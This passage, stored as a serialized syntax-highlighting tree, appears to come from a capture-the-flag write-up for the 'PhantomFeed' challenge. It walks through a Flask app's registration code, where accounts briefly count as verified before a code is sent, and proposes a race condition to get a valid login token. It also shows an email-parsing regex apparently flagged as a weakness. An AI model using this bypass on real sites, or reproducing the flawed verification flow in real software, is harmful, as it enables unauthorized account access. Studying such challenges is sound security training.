methods",{"type":33,"tag":128,"props":29684,"children":29685},{"style":312},[29686],{"type":38,"value":29687},"=[",{"type":33,"tag":128,"props":29689,"children":29690},{"style":676},[29691],{"type":38,"value":669},{"type":33,"tag":128,"props":29693,"children":29694},{"style":140},[29695],{"type":38,"value":29696},"GET",{"type":33,"tag":128,"props":29698,"children":29699},{"style":676},[29700],{"type":38,"value":669},{"type":33,"tag":128,"props":29702,"children":29703},{"style":312},[29704],{"type":38,"value":5584},{"type":33,"tag":128,"props":29706,"children":29707},{"style":676},[29708],{"type":38,"value":679},{"type":33,"tag":128,"props":29710,"children":29711},{"style":140},[29712],{"type":38,"value":1406},{"type":33,"tag":128,"props":29714,"children":29715},{"style":676},[29716],{"type":38,"value":669},{"type":33,"tag":128,"props":29718,"children":29719},{"style":312},[29720],{"type":38,"value":29721},"])\n",{"type":33,"tag":128,"props":29723,"children":29724},{"class":130,"line":362},[29725,29729,29734],{"type":33,"tag":128,"props":29726,"children":29727},{"style":300},[29728],{"type":38,"value":10402},{"type":33,"tag":128,"props":29730,"children":29731},{"style":135},[29732],{"type":38,"value":29733}," register",{"type":33,"tag":128,"props":29735,"children":29736},{"style":312},[29737],{"type":38,"value":10412},{"type":33,"tag":128,"props":29739,"children":29740},{"class":130,"line":403},[29741,29746,29751],{"type":33,"tag":128,"props":29742,"children":29743},{"style":312},[29744],{"type":38,"value":29745}," [",{"type":33,"tag":128,"props":29747,"children":29748},{"style":151},[29749],{"type":38,"value":29750},"...",{"type":33,"tag":128,"props":29752,"children":29753},{"style":312},[29754],{"type":38,"value":3262},{"type":33,"tag":128,"props":29756,"children":29757},{"class":130,"line":739},[29758,29763,29767,29772,29776,29781,29785,29790,29794,29799,29803,29808,29812,29817,29821],{"type":33,"tag":128,"props":29759,"children":29760},{"style":323},[29761],{"type":38,"value":29762}," user_valid",{"type":33,"tag":128,"props":29764,"children":29765},{"style":312},[29766],{"type":38,"value":5584},{"type":33,"tag":128,"props":29768,"children":29769},{"style":323},[29770],{"type":38,"value":29771}," user_id ",{"type":33,"tag":128,"props":29773,"children":29774},{"style":312},[29775],{"type":38,"value":315},{"type":33,"tag":128,"props":29777,"children":29778},{"style":323},[29779],{"type":38,"value":29780}," db_session",{"type":33,"tag":128,"props":29782,"children":29783},{"style":312},[29784],{"type":38,"value":215},{"type":33,"tag":128,"props":29786,"children":29787},{"style":323},[29788],{"type":38,"value":29789},"create_user",{"type":33,"tag":128,"props":29791,"children":29792},{"style":312},[29793],{"type":38,"value":5566},{"type":33,"tag":128,"props":29795,"children":29796},{"style":323},[29797],{"type":38,"value":29798},"username",{"type":33,"tag":128,"props":29800,"children":29801},{"style":312},[29802],{"type":38,"value":5584},{"type":33,"tag":128,"props":29804,"children":29805},{"style":323},[29806],{"type":38,"value":29807}," password",{"type":33,"tag":128,"props":29809,"children":29810},{"style":312},[29811],{"type":38,"value":5584},{"type":33,"tag":128,"props":29813,"children":29814},{"style":323},[29815],{"type":38,"value":29816}," email",{"type":33,"tag":128,"props":29818,"children":29819},{"style":312},[29820],{"type":38,"value":2966},{"type":33,"tag":128,"props":29822,"children":29823},{"style":5541},[29824],{"type":38,"value":29825}," # \u003C--- Here the account is created\n",{"type":33,"tag":128,"props":29827,"children":29828},{"class":130,"line":765},[29829,29833,29837],{"type":33,"tag":128,"props":29830,"children":29831},{"style":312},[29832],{"type":38,"value":29745},{"type":33,"tag":128,"props":29834,"children":29835},{"style":151},[29836],{"type":38,"value":29750},{"type":33,"tag":128,"props":29838,"children":29839},{"style":312},[29840],{"type":38,"value":3262},{"type":33,"tag":128,"props":29842,"children":29843},{"class":130,"line":804},[29844,29849,29853,29858,29862,29867],{"type":33,"tag":128,"props":29845,"children":29846},{"style":323},[29847],{"type":38,"value":29848}," email_client ",{"type":33,"tag":128,"props":29850,"children":29851},{"style":312},[29852],{"type":38,"value":315},{"type":33,"tag":128,"props":29854,"children":29855},{"style":323},[29856],{"type":38,"value":29857}," EmailClient",{"type":33,"tag":128,"props":29859,"children":29860},{"style":312},[29861],{"type":38,"value":5566},{"type":33,"tag":128,"props":29863,"children":29864},{"style":323},[29865],{"type":38,"value":29866},"email",{"type":33,"tag":128,"props":29868,"children":29869},{"style":312},[29870],{"type":38,"value":2427},{"type":33,"tag":128,"props":29872,"children":29873},{"class":130,"line":839},[29874,29879,29883,29887,29891,29896,29900,29905,29909],{"type":33,"tag":128,"props":29875,"children":29876},{"style":323},[29877],{"type":38,"value":29878}," verification_code ",{"type":33,"tag":128,"props":29880,"children":29881},{"style":312},[29882],{"type":38,"value":315},{"type":33,"tag":128,"props":29884,"children":29885},{"style":323},[29886],{"type":38,"value":29780},{"type":33,"tag":128,"props":29888,"children":29889},{"style":312},[29890],{"type":38,"value":215},{"type":33,"tag":128,"props":29892,"children":29893},{"style":323},[29894],{"type":38,"value":29895},"add_verification",{"type":33,"tag":128,"props":29897,"children":29898},{"style":312},[29899],{"type":38,"value":5566},{"type":33,"tag":128,"props":29901,"children":29902},{"style":323},[29903],{"type":38,"value":29904},"user_id",{"type":33,"tag":128,"props":29906,"children":29907},{"style":312},[29908],{"type":38,"value":2966},{"type":33,"tag":128,"props":29910,"children":29911},{"style":5541},[29912],{"type":38,"value":29913}," # \u003C--- Here is the boolean set to False\n",{"type":33,"tag":128,"props":29915,"children":29916},{"class":130,"line":848},[29917,29922,29926,29931,29935,29939,29944,29948,29953,29957,29961],{"type":33,"tag":128,"props":29918,"children":29919},{"style":323},[29920],{"type":38,"value":29921}," email_client",{"type":33,"tag":128,"props":29923,"children":29924},{"style":312},[29925],{"type":38,"value":215},{"type":33,"tag":128,"props":29927,"children":29928},{"style":323},[29929],{"type":38,"value":29930},"send_email",{"type":33,"tag":128,"props":29932,"children":29933},{"style":312},[29934],{"type":38,"value":5566},{"type":33,"tag":128,"props":29936,"children":29937},{"style":300},[29938],{"type":38,"value":11107},{"type":33,"tag":128,"props":29940,"children":29941},{"style":140},[29942],{"type":38,"value":29943},"\"http://phantomfeed.htb/phantomfeed/confirm?verification_code=",{"type":33,"tag":128,"props":29945,"children":29946},{"style":151},[29947],{"type":38,"value":7246},{"type":33,"tag":128,"props":29949,"children":29950},{"style":323},[29951],{"type":38,"value":29952},"verification_code",{"type":33,"tag":128,"props":29954,"children":29955},{"style":151},[29956],{"type":38,"value":5730},{"type":33,"tag":128,"props":29958,"children":29959},{"style":140},[29960],{"type":38,"value":669},{"type":33,"tag":128,"props":29962,"children":29963},{"style":312},[29964],{"type":38,"value":2427},{"type":33,"tag":128,"props":29966,"children":29967},{"class":130,"line":976},[29968],{"type":33,"tag":128,"props":29969,"children":29970},{"style":323},[29971],{"type":38,"value":5894},{"type":33,"tag":128,"props":29973,"children":29974},{"class":130,"line":988},[29975,29979,29984,29988,29992,29997,30001,30005,30010,30014,30018,30022,30026,30030,30034,30038,30042,30047,30051,30056],{"type":33,"tag":128,"props":29976,"children":29977},{"style":1576},[29978],{"type":38,"value":13056},{"type":33,"tag":128,"props":29980,"children":29981},{"style":323},[29982],{"type":38,"value":29983}," render_template",{"type":33,"tag":128,"props":29985,"children":29986},{"style":312},[29987],{"type":38,"value":5566},{"type":33,"tag":128,"props":29989,"children":29990},{"style":676},[29991],{"type":38,"value":669},{"type":33,"tag":128,"props":29993,"children":29994},{"style":140},[29995],{"type":38,"value":29996},"error.html",{"type":33,"tag":128,"props":29998,"children":29999},{"style":676},[30000],{"type":38,"value":669},{"type":33,"tag":128,"props":30002,"children":30003},{"style":312},[30004],{"type":38,"value":5584},{"type":33,"tag":128,"props":30006,"children":30007},{"style":306},[30008],{"type":38,"value":30009}," title",{"type":33,"tag":128,"props":30011,"children":30012},{"style":312},[30013],{"type":38,"value":315},{"type":33,"tag":128,"props":30015,"children":30016},{"style":676},[30017],{"type":38,"value":669},{"type":33,"tag":128,"props":30019,"children":30020},{"style":140},[30021],{"type":38,"value":6889},{"type":33,"tag":128,"props":30023,"children":30024},{"style":676},[30025],{"type":38,"value":669},{"type":33,"tag":128,"props":30027,"children":30028},{"style":312},[30029],{"type":38,"value":5584},{"type":33,"tag":128,"props":30031,"children":30032},{"style":306},[30033],{"type":38,"value":14251},{"type":33,"tag":128,"props":30035,"children":30036},{"style":312},[30037],{"type":38,"value":315},{"type":33,"tag":128,"props":30039,"children":30040},{"style":676},[30041],{"type":38,"value":669},{"type":33,"tag":128,"props":30043,"children":30044},{"style":140},[30045],{"type":38,"value":30046},"verification code sent",{"type":33,"tag":128,"props":30048,"children":30049},{"style":676},[30050],{"type":38,"value":669},{"type":33,"tag":128,"props":30052,"children":30053},{"style":312},[30054],{"type":38,"value":30055},"),",{"type":33,"tag":128,"props":30057,"children":30058},{"style":523},[30059],{"type":38,"value":30060}," 200\n",{"type":33,"tag":114,"props":30062,"children":30063},{"lang":10227},[30064],{"type":33,"tag":119,"props":30065,"children":30067},{"className":10231,"code":30066,"language":10227,"meta":8,"style":8},"def add_verification(self, user_id):\n verification_code = generate(12)\n self.session.query(Users).filter(Users.id == user_id)\n .update({\"verification_code\": verification_code, \"verified\": False})\n self.session.commit()\n return verification_code\n",[30068],{"type":33,"tag":105,"props":30069,"children":30070},{"__ignoreMap":8},[30071,30105,30135,30207,30274,30302],{"type":33,"tag":128,"props":30072,"children":30073},{"class":130,"line":131},[30074,30078,30083,30087,30092,30096,30101],{"type":33,"tag":128,"props":30075,"children":30076},{"style":300},[30077],{"type":38,"value":10402},{"type":33,"tag":128,"props":30079,"children":30080},{"style":135},[30081],{"type":38,"value":30082}," add_verification",{"type":33,"tag":128,"props":30084,"children":30085},{"style":312},[30086],{"type":38,"value":5566},{"type":33,"tag":128,"props":30088,"children":30089},{"style":323},[30090],{"type":38,"value":30091},"self",{"type":33,"tag":128,"props":30093,"children":30094},{"style":312},[30095],{"type":38,"value":5584},{"type":33,"tag":128,"props":30097,"children":30098},{"style":323},[30099],{"type":38,"value":30100}," user_id",{"type":33,"tag":128,"props":30102,"children":30103},{"style":312},[30104],{"type":38,"value":10497},{"type":33,"tag":128,"props":30106,"children":30107},{"class":130,"line":362},[30108,30113,30117,30122,30126,30131],{"type":33,"tag":128,"props":30109,"children":30110},{"style":323},[30111],{"type":38,"value":30112}," verification_code ",{"type":33,"tag":128,"props":30114,"children":30115},{"style":312},[30116],{"type":38,"value":315},{"type":33,"tag":128,"props":30118,"children":30119},{"style":323},[30120],{"type":38,"value":30121}," generate",{"type":33,"tag":128,"props":30123,"children":30124},{"style":312},[30125],{"type":38,"value":5566},{"type":33,"tag":128,"props":30127,"children":30128},{"style":523},[30129],{"type":38,"value":30130},"12",{"type":33,"tag":128,"props":30132,"children":30133},{"style":312},[30134],{"type":38,"value":2427},{"type":33,"tag":128,"props":30136,"children":30137},{"class":130,"line":403},[30138,30143,30147,30151,30155,30159,30163,30168,30172,30177,30181,30185,30189,30194,30199,30203],{"type":33,"tag":128,"props":30139,"children":30140},{"style":151},[30141],{"type":38,"value":30142}," self",{"type":33,"tag":128,"props":30144,"children":30145},{"style":312},[30146],{"type":38,"value":215},{"type":33,"tag":128,"props":30148,"children":30149},{"style":323},[30150],{"type":38,"value":6557},{"type":33,"tag":128,"props":30152,"children":30153},{"style":312},[30154],{"type":38,"value":215},{"type":33,"tag":128,"props":30156,"children":30157},{"style":323},[30158],{"type":38,"value":5810},{"type":33,"tag":128,"props":30160,"children":30161},{"style":312},[30162],{"type":38,"value":5566},{"type":33,"tag":128,"props":30164,"children":30165},{"style":323},[30166],{"type":38,"value":30167},"Users",{"type":33,"tag":128,"props":30169,"children":30170},{"style":312},[30171],{"type":38,"value":6700},{"type":33,"tag":128,"props":30173,"children":30174},{"style":323},[30175],{"type":38,"value":30176},"filter",{"type":33,"tag":128,"props":30178,"children":30179},{"style":312},[30180],{"type":38,"value":5566},{"type":33,"tag":128,"props":30182,"children":30183},{"style":323},[30184],{"type":38,"value":30167},{"type":33,"tag":128,"props":30186,"children":30187},{"style":312},[30188],{"type":38,"value":215},{"type":33,"tag":128,"props":30190,"children":30191},{"style":323},[30192],{"type":38,"value":30193},"id ",{"type":33,"tag":128,"props":30195,"children":30196},{"style":300},[30197],{"type":38,"value":30198},"==",{"type":33,"tag":128,"props":30200,"children":30201},{"style":323},[30202],{"type":38,"value":30100},{"type":33,"tag":128,"props":30204,"children":30205},{"style":312},[30206],{"type":38,"value":2427},{"type":33,"tag":128,"props":30208,"children":30209},{"class":130,"line":739},[30210,30215,30220,30224,30228,30232,30236,30240,30245,30249,30253,30257,30261,30265,30270],{"type":33,"tag":128,"props":30211,"children":30212},{"style":312},[30213],{"type":38,"value":30214}," .",{"type":33,"tag":128,"props":30216,"children":30217},{"style":323},[30218],{"type":38,"value":30219},"update",{"type":33,"tag":128,"props":30221,"children":30222},{"style":312},[30223],{"type":38,"value":5836},{"type":33,"tag":128,"props":30225,"children":30226},{"style":676},[30227],{"type":38,"value":669},{"type":33,"tag":128,"props":30229,"children":30230},{"style":140},[30231],{"type":38,"value":29952},{"type":33,"tag":128,"props":30233,"children":30234},{"style":676},[30235],{"type":38,"value":669},{"type":33,"tag":128,"props":30237,"children":30238},{"style":312},[30239],{"type":38,"value":284},{"type":33,"tag":128,"props":30241,"children":30242},{"style":323},[30243],{"type":38,"value":30244}," verification_code",{"type":33,"tag":128,"props":30246,"children":30247},{"style":312},[30248],{"type":38,"value":5584},{"type":33,"tag":128,"props":30250,"children":30251},{"style":676},[30252],{"type":38,"value":679},{"type":33,"tag":128,"props":30254,"children":30255},{"style":140},[30256],{"type":38,"value":29622},{"type":33,"tag":128,"props":30258,"children":30259},{"style":676},[30260],{"type":38,"value":669},{"type":33,"tag":128,"props":30262,"children":30263},{"style":312},[30264],{"type":38,"value":284},{"type":33,"tag":128,"props":30266,"children":30267},{"style":1576},[30268],{"type":38,"value":30269}," False",{"type":33,"tag":128,"props":30271,"children":30272},{"style":312},[30273],{"type":38,"value":23505},{"type":33,"tag":128,"props":30275,"children":30276},{"class":130,"line":765},[30277,30281,30285,30289,30293,30298],{"type":33,"tag":128,"props":30278,"children":30279},{"style":151},[30280],{"type":38,"value":30142},{"type":33,"tag":128,"props":30282,"children":30283},{"style":312},[30284],{"type":38,"value":215},{"type":33,"tag":128,"props":30286,"children":30287},{"style":323},[30288],{"type":38,"value":6557},{"type":33,"tag":128,"props":30290,"children":30291},{"style":312},[30292],{"type":38,"value":215},{"type":33,"tag":128,"props":30294,"children":30295},{"style":323},[30296],{"type":38,"value":30297},"commit",{"type":33,"tag":128,"props":30299,"children":30300},{"style":312},[30301],{"type":38,"value":7857},{"type":33,"tag":128,"props":30303,"children":30304},{"class":130,"line":804},[30305,30309],{"type":33,"tag":128,"props":30306,"children":30307},{"style":1576},[30308],{"type":38,"value":6810},{"type":33,"tag":128,"props":30310,"children":30311},{"style":323},[30312],{"type":38,"value":30313}," verification_code\n",{"type":33,"tag":47,"props":30315,"children":30316},{},[30317],{"type":38,"value":30318},"We can see below that by default the attribute verified is set to True and is only changed to False at the time of sending the email.",{"type":33,"tag":114,"props":30320,"children":30321},{"lang":10227},[30322],{"type":33,"tag":119,"props":30323,"children":30325},{"className":10231,"code":30324,"language":10227,"meta":8,"style":8},"class Users(Base):\n __tablename__ = \"users\"\n id = Column(Integer, primary_key=True)\n verification_code = Column(String)\n verified = Column(Boolean, default=True)\n username = Column(String)\n password = Column(String)\n email = Column(String)\n",[30326],{"type":33,"tag":105,"props":30327,"children":30328},{"__ignoreMap":8},[30329,30356,30381,30429,30456,30502,30530,30558],{"type":33,"tag":128,"props":30330,"children":30331},{"class":130,"line":131},[30332,30337,30343,30347,30352],{"type":33,"tag":128,"props":30333,"children":30334},{"style":300},[30335],{"type":38,"value":30336},"class",{"type":33,"tag":128,"props":30338,"children":30340},{"style":30339},"--shiki-default:#5DA994",[30341],{"type":38,"value":30342}," Users",{"type":33,"tag":128,"props":30344,"children":30345},{"style":312},[30346],{"type":38,"value":5566},{"type":33,"tag":128,"props":30348,"children":30349},{"style":135},[30350],{"type":38,"value":30351},"Base",{"type":33,"tag":128,"props":30353,"children":30354},{"style":312},[30355],{"type":38,"value":10497},{"type":33,"tag":128,"props":30357,"children":30358},{"class":130,"line":362},[30359,30364,30368,30372,30377],{"type":33,"tag":128,"props":30360,"children":30361},{"style":323},[30362],{"type":38,"value":30363}," __tablename__ ",{"type":33,"tag":128,"props":30365,"children":30366},{"style":312},[30367],{"type":38,"value":315},{"type":33,"tag":128,"props":30369,"children":30370},{"style":676},[30371],{"type":38,"value":679},{"type":33,"tag":128,"props":30373,"children":30374},{"style":140},[30375],{"type":38,"value":30376},"users",{"type":33,"tag":128,"props":30378,"children":30379},{"style":676},[30380],{"type":38,"value":836},{"type":33,"tag":128,"props":30382,"children":30383},{"class":130,"line":403},[30384,30389,30393,30398,30402,30407,30411,30416,30420,30425],{"type":33,"tag":128,"props":30385,"children":30386},{"style":437},[30387],{"type":38,"value":30388}," id",{"type":33,"tag":128,"props":30390,"children":30391},{"style":312},[30392],{"type":38,"value":5657},{"type":33,"tag":128,"props":30394,"children":30395},{"style":323},[30396],{"type":38,"value":30397}," Column",{"type":33,"tag":128,"props":30399,"children":30400},{"style":312},[30401],{"type":38,"value":5566},{"type":33,"tag":128,"props":30403,"children":30404},{"style":323},[30405],{"type":38,"value":30406},"Integer",{"type":33,"tag":128,"props":30408,"children":30409},{"style":312},[30410],{"type":38,"value":5584},{"type":33,"tag":128,"props":30412,"children":30413},{"style":306},[30414],{"type":38,"value":30415}," primary_key",{"type":33,"tag":128,"props":30417,"children":30418},{"style":312},[30419],{"type":38,"value":315},{"type":33,"tag":128,"props":30421,"children":30422},{"style":1576},[30423],{"type":38,"value":30424},"True",{"type":33,"tag":128,"props":30426,"children":30427},{"style":312},[30428],{"type":38,"value":2427},{"type":33,"tag":128,"props":30430,"children":30431},{"class":130,"line":739},[30432,30436,30440,30444,30448,30452],{"type":33,"tag":128,"props":30433,"children":30434},{"style":323},[30435],{"type":38,"value":30112},{"type":33,"tag":128,"props":30437,"children":30438},{"style":312},[30439],{"type":38,"value":315},{"type":33,"tag":128,"props":30441,"children":30442},{"style":323},[30443],{"type":38,"value":30397},{"type":33,"tag":128,"props":30445,"children":30446},{"style":312},[30447],{"type":38,"value":5566},{"type":33,"tag":128,"props":30449,"children":30450},{"style":323},[30451],{"type":38,"value":25569},{"type":33,"tag":128,"props":30453,"children":30454},{"style":312},[30455],{"type":38,"value":2427},{"type":33,"tag":128,"props":30457,"children":30458},{"class":130,"line":765},[30459,30464,30468,30472,30476,30481,30485,30490,30494,30498],{"type":33,"tag":128,"props":30460,"children":30461},{"style":323},[30462],{"type":38,"value":30463}," verified ",{"type":33,"tag":128,"props":30465,"children":30466},{"style":312},[30467],{"type":38,"value":315},{"type":33,"tag":128,"props":30469,"children":30470},{"style":323},[30471],{"type":38,"value":30397},{"type":33,"tag":128,"props":30473,"children":30474},{"style":312},[30475],{"type":38,"value":5566},{"type":33,"tag":128,"props":30477,"children":30478},{"style":323},[30479],{"type":38,"value":30480},"Boolean",{"type":33,"tag":128,"props":30482,"children":30483},{"style":312},[30484],{"type":38,"value":5584},{"type":33,"tag":128,"props":30486,"children":30487},{"style":306},[30488],{"type":38,"value":30489}," default",{"type":33,"tag":128,"props":30491,"children":30492},{"style":312},[30493],{"type":38,"value":315},{"type":33,"tag":128,"props":30495,"children":30496},{"style":1576},[30497],{"type":38,"value":30424},{"type":33,"tag":128,"props":30499,"children":30500},{"style":312},[30501],{"type":38,"value":2427},{"type":33,"tag":128,"props":30503,"children":30504},{"class":130,"line":804},[30505,30510,30514,30518,30522,30526],{"type":33,"tag":128,"props":30506,"children":30507},{"style":323},[30508],{"type":38,"value":30509}," username ",{"type":33,"tag":128,"props":30511,"children":30512},{"style":312},[30513],{"type":38,"value":315},{"type":33,"tag":128,"props":30515,"children":30516},{"style":323},[30517],{"type":38,"value":30397},{"type":33,"tag":128,"props":30519,"children":30520},{"style":312},[30521],{"type":38,"value":5566},{"type":33,"tag":128,"props":30523,"children":30524},{"style":323},[30525],{"type":38,"value":25569},{"type":33,"tag":128,"props":30527,"children":30528},{"style":312},[30529],{"type":38,"value":2427},{"type":33,"tag":128,"props":30531,"children":30532},{"class":130,"line":839},[30533,30538,30542,30546,30550,30554],{"type":33,"tag":128,"props":30534,"children":30535},{"style":323},[30536],{"type":38,"value":30537}," password ",{"type":33,"tag":128,"props":30539,"children":30540},{"style":312},[30541],{"type":38,"value":315},{"type":33,"tag":128,"props":30543,"children":30544},{"style":323},[30545],{"type":38,"value":30397},{"type":33,"tag":128,"props":30547,"children":30548},{"style":312},[30549],{"type":38,"value":5566},{"type":33,"tag":128,"props":30551,"children":30552},{"style":323},[30553],{"type":38,"value":25569},{"type":33,"tag":128,"props":30555,"children":30556},{"style":312},[30557],{"type":38,"value":2427},{"type":33,"tag":128,"props":30559,"children":30560},{"class":130,"line":848},[30561,30566,30570,30574,30578,30582],{"type":33,"tag":128,"props":30562,"children":30563},{"style":323},[30564],{"type":38,"value":30565}," email ",{"type":33,"tag":128,"props":30567,"children":30568},{"style":312},[30569],{"type":38,"value":315},{"type":33,"tag":128,"props":30571,"children":30572},{"style":323},[30573],{"type":38,"value":30397},{"type":33,"tag":128,"props":30575,"children":30576},{"style":312},[30577],{"type":38,"value":5566},{"type":33,"tag":128,"props":30579,"children":30580},{"style":323},[30581],{"type":38,"value":25569},{"type":33,"tag":128,"props":30583,"children":30584},{"style":312},[30585],{"type":38,"value":2427},{"type":33,"tag":47,"props":30587,"children":30588},{},[30589],{"type":38,"value":30590},"We know that: the account is created, and then the boolean is set to False. After this, we can therefore ask ourselves whether a race condition is possible in order to connect at the moment when the boolean is True, which allows us to retrieve a valid token.",{"type":33,"tag":47,"props":30592,"children":30593},{},[30594,30596,30602],{"type":38,"value":30595},"If we look at the EmailClient class that is used to call the send email function ",{"type":33,"tag":105,"props":30597,"children":30599},{"className":30598},[],[30600],{"type":38,"value":30601},"email_client.send_email",{"type":38,"value":215},{"type":33,"tag":114,"props":30604,"children":30605},{"lang":10227},[30606],{"type":33,"tag":119,"props":30607,"children":30609},{"className":10231,"code":30608,"language":10227,"meta":8,"style":8},"email_client = EmailClient(email)\n",[30610],{"type":33,"tag":105,"props":30611,"children":30612},{"__ignoreMap":8},[30613],{"type":33,"tag":128,"props":30614,"children":30615},{"class":130,"line":131},[30616,30621,30625,30629,30633,30637],{"type":33,"tag":128,"props":30617,"children":30618},{"style":323},[30619],{"type":38,"value":30620},"email_client ",{"type":33,"tag":128,"props":30622,"children":30623},{"style":312},[30624],{"type":38,"value":315},{"type":33,"tag":128,"props":30626,"children":30627},{"style":323},[30628],{"type":38,"value":29857},{"type":33,"tag":128,"props":30630,"children":30631},{"style":312},[30632],{"type":38,"value":5566},{"type":33,"tag":128,"props":30634,"children":30635},{"style":323},[30636],{"type":38,"value":29866},{"type":33,"tag":128,"props":30638,"children":30639},{"style":312},[30640],{"type":38,"value":2427},{"type":33,"tag":47,"props":30642,"children":30643},{},[30644],{"type":38,"value":30645},"We can see that a regex is executed inside the constructor of the class.",{"type":33,"tag":114,"props":30647,"children":30648},{"lang":10227},[30649],{"type":33,"tag":119,"props":30650,"children":30652},{"className":10231,"code":30651,"language":10227,"meta":8,"style":8},"class EmailClient:\n def __init__(self, to_email):\n email_verified = self.parse_email(to_email)\n[...]\n def parse_email(self, email):\n pattern = r\"^([0-9a-zA-Z]([-.\\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\\w]*[0-9a-zA-Z])*\\.)+[a-zA-Z]{2,9})$\"\n\n try:\n match = re.match(pattern, email)\n[...]\n",[30653],{"type":33,"tag":105,"props":30654,"children":30655},{"__ignoreMap":8},[30656,30671,30705,30744,30759,30791,30949,30956,30968,31015],{"type":33,"tag":128,"props":30657,"children":30658},{"class":130,"line":131},[30659,30663,30667],{"type":33,"tag":128,"props":30660,"children":30661},{"style":300},[30662],{"type":38,"value":30336},{"type":33,"tag":128,"props":30664,"children":30665},{"style":30339},[30666],{"type":38,"value":29857},{"type":33,"tag":128,"props":30668,"children":30669},{"style":312},[30670],{"type":38,"value":5318},{"type":33,"tag":128,"props":30672,"children":30673},{"class":130,"line":362},[30674,30679,30684,30688,30692,30696,30701],{"type":33,"tag":128,"props":30675,"children":30676},{"style":300},[30677],{"type":38,"value":30678}," def",{"type":33,"tag":128,"props":30680,"children":30681},{"style":437},[30682],{"type":38,"value":30683}," __init__",{"type":33,"tag":128,"props":30685,"children":30686},{"style":312},[30687],{"type":38,"value":5566},{"type":33,"tag":128,"props":30689,"children":30690},{"style":323},[30691],{"type":38,"value":30091},{"type":33,"tag":128,"props":30693,"children":30694},{"style":312},[30695],{"type":38,"value":5584},{"type":33,"tag":128,"props":30697,"children":30698},{"style":323},[30699],{"type":38,"value":30700}," to_email",{"type":33,"tag":128,"props":30702,"children":30703},{"style":312},[30704],{"type":38,"value":10497},{"type":33,"tag":128,"props":30706,"children":30707},{"class":130,"line":403},[30708,30713,30717,30722,30726,30731,30735,30740],{"type":33,"tag":128,"props":30709,"children":30710},{"style":323},[30711],{"type":38,"value":30712}," email_verified ",{"type":33,"tag":128,"props":30714,"children":30715},{"style":312},[30716],{"type":38,"value":315},{"type":33,"tag":128,"props":30718,"children":30719},{"style":151},[30720],{"type":38,"value":30721}," self",{"type":33,"tag":128,"props":30723,"children":30724},{"style":312},[30725],{"type":38,"value":215},{"type":33,"tag":128,"props":30727,"children":30728},{"style":323},[30729],{"type":38,"value":30730},"parse_email",{"type":33,"tag":128,"props":30732,"children":30733},{"style":312},[30734],{"type":38,"value":5566},{"type":33,"tag":128,"props":30736,"children":30737},{"style":323},[30738],{"type":38,"value":30739},"to_email",{"type":33,"tag":128,"props":30741,"children":30742},{"style":312},[30743],{"type":38,"value":2427},{"type":33,"tag":128,"props":30745,"children":30746},{"class":130,"line":739},[30747,30751,30755],{"type":33,"tag":128,"props":30748,"children":30749},{"style":312},[30750],{"type":38,"value":344},{"type":33,"tag":128,"props":30752,"children":30753},{"style":151},[30754],{"type":38,"value":29750},{"type":33,"tag":128,"props":30756,"children":30757},{"style":312},[30758],{"type":38,"value":3262},{"type":33,"tag":128,"props":30760,"children":30761},{"class":130,"line":765},[30762,30766,30771,30775,30779,30783,30787],{"type":33,"tag":128,"props":30763,"children":30764},{"style":300},[30765],{"type":38,"value":30678},{"type":33,"tag":128,"props":30767,"children":30768},{"style":135},[30769],{"type":38,"value":30770}," parse_email",{"type":33,"tag":128,"props":30772,"children":30773},{"style":312},[30774],{"type":38,"value":5566},{"type":33,"tag":128,"props":30776,"children":30777},{"style":323},[30778],{"type":38,"value":30091},{"type":33,"tag":128,"props":30780,"children":30781},{"style":312},[30782],{"type":38,"value":5584},{"type":33,"tag":128,"props":30784,"children":30785},{"style":323},[30786],{"type":38,"value":29816},{"type":33,"tag":128,"props":30788,"children":30789},{"style":312},[30790],{"type":38,"value":10497},{"type":33,"tag":128,"props":30792,"children":30793},{"class":130,"line":804},[30794,30799,30803,30808,30812,30817,30821,30826,30830,30835,30840,30844,30848,30852,30856,30860,30864,30868,30872,30876,30880,30884,30889,30893,30897,30901,30905,30909,30913,30919,30923,30927,30932,30937,30941,30945],{"type":33,"tag":128,"props":30795,"children":30796},{"style":323},[30797],{"type":38,"value":30798}," pattern ",{"type":33,"tag":128,"props":30800,"children":30801},{"style":312},[30802],{"type":38,"value":315},{"type":33,"tag":128,"props":30804,"children":30805},{"style":300},[30806],{"type":38,"value":30807}," r",{"type":33,"tag":128,"props":30809,"children":30810},{"style":676},[30811],{"type":38,"value":669},{"type":33,"tag":128,"props":30813,"children":30814},{"style":437},[30815],{"type":38,"value":30816},"^",{"type":33,"tag":128,"props":30818,"children":30819},{"style":312},[30820],{"type":38,"value":5566},{"type":33,"tag":128,"props":30822,"children":30823},{"style":151},[30824],{"type":38,"value":30825},"[0-9a-zA-Z]",{"type":33,"tag":128,"props":30827,"children":30828},{"style":312},[30829],{"type":38,"value":5566},{"type":33,"tag":128,"props":30831,"children":30832},{"style":151},[30833],{"type":38,"value":30834},"[-.",{"type":33,"tag":128,"props":30836,"children":30837},{"style":437},[30838],{"type":38,"value":30839},"\\w",{"type":33,"tag":128,"props":30841,"children":30842},{"style":151},[30843],{"type":38,"value":354},{"type":33,"tag":128,"props":30845,"children":30846},{"style":523},[30847],{"type":38,"value":9683},{"type":33,"tag":128,"props":30849,"children":30850},{"style":151},[30851],{"type":38,"value":30825},{"type":33,"tag":128,"props":30853,"children":30854},{"style":312},[30855],{"type":38,"value":2966},{"type":33,"tag":128,"props":30857,"children":30858},{"style":523},[30859],{"type":38,"value":9683},{"type":33,"tag":128,"props":30861,"children":30862},{"style":16561},[30863],{"type":38,"value":29642},{"type":33,"tag":128,"props":30865,"children":30866},{"style":312},[30867],{"type":38,"value":13071},{"type":33,"tag":128,"props":30869,"children":30870},{"style":151},[30871],{"type":38,"value":30825},{"type":33,"tag":128,"props":30873,"children":30874},{"style":312},[30875],{"type":38,"value":2966},{"type":33,"tag":128,"props":30877,"children":30878},{"style":523},[30879],{"type":38,"value":25605},{"type":33,"tag":128,"props":30881,"children":30882},{"style":312},[30883],{"type":38,"value":5566},{"type":33,"tag":128,"props":30885,"children":30886},{"style":151},[30887],{"type":38,"value":30888},"[-",{"type":33,"tag":128,"props":30890,"children":30891},{"style":437},[30892],{"type":38,"value":30839},{"type":33,"tag":128,"props":30894,"children":30895},{"style":151},[30896],{"type":38,"value":354},{"type":33,"tag":128,"props":30898,"children":30899},{"style":523},[30900],{"type":38,"value":9683},{"type":33,"tag":128,"props":30902,"children":30903},{"style":151},[30904],{"type":38,"value":30825},{"type":33,"tag":128,"props":30906,"children":30907},{"style":312},[30908],{"type":38,"value":2966},{"type":33,"tag":128,"props":30910,